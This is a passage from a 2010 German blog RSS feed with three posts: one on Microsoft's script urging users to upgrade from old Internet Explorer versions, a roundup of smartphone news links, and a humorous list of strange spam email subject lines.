			<content:encoded><![CDATA[<p>Nachdem ich den Artikel &quot;weg mit dem IE6&quot; auf freundliche Bitte von Microsoft entfernte, bin ich Euch noch eine entsch&#228;rfte Variante schuldig. Microsoft nahm daran Ansto&#223;, dass ich einfach aus der Mail zu der Aktion zitierte. Nun endlich komme ich dazu einen Artikel ganz frei von anst&#246;&#223;igen Microsoft-Aussagen zu machen. Hintergrund sind die immer noch recht weit verbreiteten alten Versionen des Internet-Explorers. </p>
<p>Microsoft m&#246;chte die &quot;Besitzer&quot; solcher IEs gezielt ansprechen und sie zum Update auf eine aktuelle Version bewegen. Besitzer anderer Browser werden nicht bel&#228;stigt und merken von der Aktion auch nichts. Dazu muss ich ausnahmsweise ein Java-Script ausf&#252;hren. Das ist &#252;brigens das einzige Java-Skript hier. Wer also f&#252;r meine Seite Java-Skript verbietet, der hat keine Nachteile. Und ja, das ist echt eine Microsoft-Aktion. Die tun das. </p>
<p>Wer schon so lange im Internet Webseiten erstellt wie ich, der wird wissen was f&#252;r ein Krampf es ist IE-konforme Webseiten zu erstellen. Der IE8 ist ja erstmals ein Schritt in die richtige Richtung, der IE9 soll geradezu standard-freundlich werden. Allein wegen der Erfahrung mit den alten Versionen surfe ich pers&#246;nlich seit Jahren mit Firefox.</p>
<p>Benutzer mit einem <strong>Internet Explorer 6</strong> werden alle 6 Stunden zum Upgrade aufgefordert. Die Meldung kann &#252;ber das &quot;x&quot; weg geklickt oder ignoriert werden:<br />
<img src="http://www.glorf.it/blog/wp-content/uploads/2010/09/ie6message.png" alt="" title="ie6message" width="943" height="38" class="aligncenter size-full wp-image-5366" /></p>
<p>Benutzer mit <strong>Internet Explorer 7</strong> werden ebenfalls alle 6 Stunden zum Upgrade aufgefordert:<br />
<img src="http://www.glorf.it/blog/wp-content/uploads/2010/09/ie7message.png" alt="" title="ie7message" width="945" height="38" class="aligncenter size-full wp-image-5367" /></p>
<p>Benutzer mit <strong>Internet Explorer 8</strong> sehen einmal pro Woche eine Werbung f&#252;r den IE9-Beta:<br />
      Meldung als Info-Bar:<br />
<img src="http://www.glorf.it/blog/wp-content/uploads/2010/09/ie8message.png" alt="" title="ie8message" width="942" height="40" class="aligncenter size-full wp-image-5368" /></p>
<p>Die Meldungen bei IE6 und 7 finde ich prima, die bei IE8 nicht so richtig, aber die kommt ja nur ab und ab. Diese Bel&#228;stigung bitte ich zu entschuldigen. Bedenkt: wenn ein paar Leser den IE6 in die W&#252;ste schicken, dann ist doch schon etwas gewonnen. Ob jemand jetzt den Firefox einsetzt oder den neuen IE ist dagegen fast nebens&#228;chlich&#8230;</p>
<p>Da schon Fragen kamen, wie denn das geht: Ich habe im Body das Java-Script &quot;Internet Explorer Detection&quot; von Microsoft eingebunden. Da man das im Quelltext ohnehin sieht, kann es wohl kaum geheim sein:</p>
<div class="codesnip-container" >&lt;script type=&quot;text/javascript&quot; src=&quot;http://www.microsoft.com/germany/msdn/components/ie/ieinfobar.js&quot;&gt;  &lt;/script&gt;</div>
<p>Wer den Inhalt des Java-Skriptes sehen will, dem hilft bspw. &quot;<a href="https://addons.mozilla.org/de/firefox/addon/1843/">Firebug</a>&quot;.</p>
<p>Und bitte denkt daran, dass es keine Frage des Geschmackes oder der Vorliebe ist, ob man mit einem alten Browser surft, sondern eine Frage der Sicherheit.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2010/10/12/webtech/immer-noch-weg-mit-dem-ie6/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SmartPhones als Zukunftsmarkt?</title>
		<link>http://www.glorf.it/blog/2010/09/29/webtech/smartphones-als-zukunftsmarkt</link>
		<comments>http://www.glorf.it/blog/2010/09/29/webtech/smartphones-als-zukunftsmarkt#comments</comments>
		<pubDate>Wed, 29 Sep 2010 19:54:04 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Smart-Phone]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=5358</guid>
		<description><![CDATA[Was ist denn blo&#223; heute los. Da jagt eine SmartPhone-Meldung bei Heise-Online die andere. Hier nur einige davon, die ich besonders interessant finde: iOS-Jailbreaks: Das Katz- und Mausspiel geht weiter: Offenbar gibt es unter den iPhone-Besitzern einen starken Freiheitsdrang, der die engen Regeln von Seiten Apple nicht hinnehmen will. Die gro&#223;e Freiheit macht auch Android [...]]]></description>
			<content:encoded><![CDATA[<p>Was ist denn blo&#223; heute los. Da jagt eine SmartPhone-Meldung bei <a href="http://www.heise.de/?seite=1">Heise-Online</a> die andere. Hier nur einige davon, die ich besonders interessant finde:</p>
<ul>
<li><a href="http://www.heise.de/newsticker/meldung/iOS-Jailbreaks-Das-Katz-und-Mausspiel-geht-weiter-1097024.html">iOS-Jailbreaks: Das Katz- und Mausspiel geht weiter</a>: Offenbar gibt es unter den iPhone-Besitzern einen starken Freiheitsdrang, der die engen Regeln von Seiten Apple nicht hinnehmen will. Die gro&#223;e Freiheit macht auch Android interessant:</li>
<li><a href="http://www.heise.de/newsticker/meldung/Umfrage-App-Entwickler-setzen-perspektivisch-auf-Android-1098131.html">Umfrage: App-Entwickler setzen perspektivisch auf Android</a>: &quot;Knapp 60 Prozent der knapp 2400 an der Erhebung teilnehmenden App-Entwickler favorisieren Android als Betriebssystem der Zukunft im Bereich mobiler Applikationen.&quot; iPhone kommt auf 35%. Das setzt aber voraus, dass der Vertrieb von den Apps f&#252;r Android attraktiv wird. Daf&#252;r will offenbar Amazon sorgen:</li>
<li><a href="http://www.heise.de/newsticker/meldung/Kommentar-Warum-Amazon-einen-Android-Store-oeffnen-will-1097870.html">Kommentar: Warum Amazon einen Android-Store &#246;ffnen will</a>: &quot;Der Bedarf an einem gro&#223;en Android-Softwareladen ist durchaus vorhanden. Google hat seinem Android Market zu wenig Aufmerksamkeit gewidmet und die eklatanten Schw&#228;chen nicht oder zu langsam behoben.&quot;</li>
</ul>
<p>Da kommt eine spannende Zeit auf uns zu&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2010/09/29/webtech/smartphones-als-zukunftsmarkt/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top 10 seltsamer SPAM-Betreffs</title>
		<link>http://www.glorf.it/blog/2010/09/27/webtech/spamlinktausch/top-10-seltsamer-spam-betreffs</link>
		<comments>http://www.glorf.it/blog/2010/09/27/webtech/spamlinktausch/top-10-seltsamer-spam-betreffs#comments</comments>
		<pubDate>Mon, 27 Sep 2010 19:13:47 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[Spam/Linktausch]]></category>
		<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=5339</guid>
		<description><![CDATA[Meistens lese ich SPAMs oder Newsletter gar nicht, sondern &#252;berfliege nur die Betreffs. Ich habe hier mal ein paar ausgefallene Betreffs gesammelt, die ich wirklich so bekommen habe: Kombinationsstarke Kleider nur f&#252;r Sie, lieber Herr Gloerfeld Kleider? Da bin ich ja richtig scharf drauf&#8230; Was m&#246;gen, die von mir denken? Fom Mr. Ming Yang &#34;From&#34; [...]]]></description>
			<content:encoded><![CDATA[<p>Meistens lese ich SPAMs oder Newsletter gar nicht, sondern &#252;berfliege nur die Betreffs. Ich habe hier mal ein paar ausgefallene Betreffs gesammelt, die ich wirklich so bekommen habe:</p>
<ul>
<li><em>Kombinationsstarke Kleider nur f&#252;r Sie, lieber Herr Gloerfeld</em><br />
Kleider? Da bin ich ja richtig scharf drauf&#8230; Was m&#246;gen, die von mir denken?</li>
<li><em>Fom Mr. Ming Yang </em><br />
&quot;From&quot; oder &quot;<a href="http://de.wikipedia.org/wiki/FOM">Fom</a>&quot; &#8211; auch egal: jedenfalls ohne mich</li>
<li><em>manner as in Pers. 453, [Greek: phtharentes]=&quot;shi </em><br />
Offenbar hat die Spamsoftware die Steuersequenzen nicht verarbeitet, sondern einfach als Text abgeschickt&#8230; So wie hier: <a href="http://www.friseurjobagent.at/jobangebote-bewerbung-popup.php?jid=1535&#038;PHPSESSID=55b338a0ae4e0e09d08f451b5582f97b">[fett]Filialfachverk&#228;ufer (m/w)[/fett]</a>. Ob da sich nun lauter &#220;bergewichtige melden?</li>
<li><em>Finden Sie Ihr pers&#246;nliches Lieblingsteil, lieber Herr Gloerfeld</em><br />
Ich habe schon eines und kaufe bestimmt kein Neues bei dem Modegesch&#228;ft, dass mir auch schon oben die Kleider anbot&#8230;</li>
<li><em>Danke Thilo!</em><br />
angeblich vom &quot;Freundeskreis Thilo Sarrazin&quot;&#8230; im Text verlinkt auf den Google-Cache einer mit Sicherheit b&#246;sartigen Seite.</li>
<li><em>Bueno &lt;INS style=&quot;DISPLAY: none&quot;&gt;措&lt;/INS&gt;</em><br />
Ob das eine neue Technik ist irgendeinen M&#252;ll ausf&#252;hren zu lassen? Daf&#252;r ist das doch fast etwas kurz, der M&#252;ll&#8230;</li>
<li><em>FKK Datenbank</em><br />
Ist das die neue Datenbank-Technik?</li>
<li><em>Wollen Sie wirklich fett sein?</em><br />
Wollen Sie mich wirklich beleidigen? Wer liest denn Mails mit so einem unversch&#228;mten Betreff?</li>
<li><em>Gr&#252;&#223;e aus Hong Kong</em><br />
schrieb Peter Wong</li>
<li><em>Lassen Sie Ihre Kollegen ueberraschen mit Brand zeitmesser -80%</em><br />
vermutlich Werbung f&#252;r angebliche Schweizer Markenuhren.</li>
<li><em>Anspruch Information!!! </em><br />
Der Anspruch hat hier bei seinem Sinkflug den Boden durchschlagen. Daher mache ich hiermit Schluss&#8230;</li>
</ul>
<p>Weitere witzige SPAM-Betreffs sind willkommen.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2010/09/27/webtech/spamlinktausch/top-10-seltsamer-spam-betreffs/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

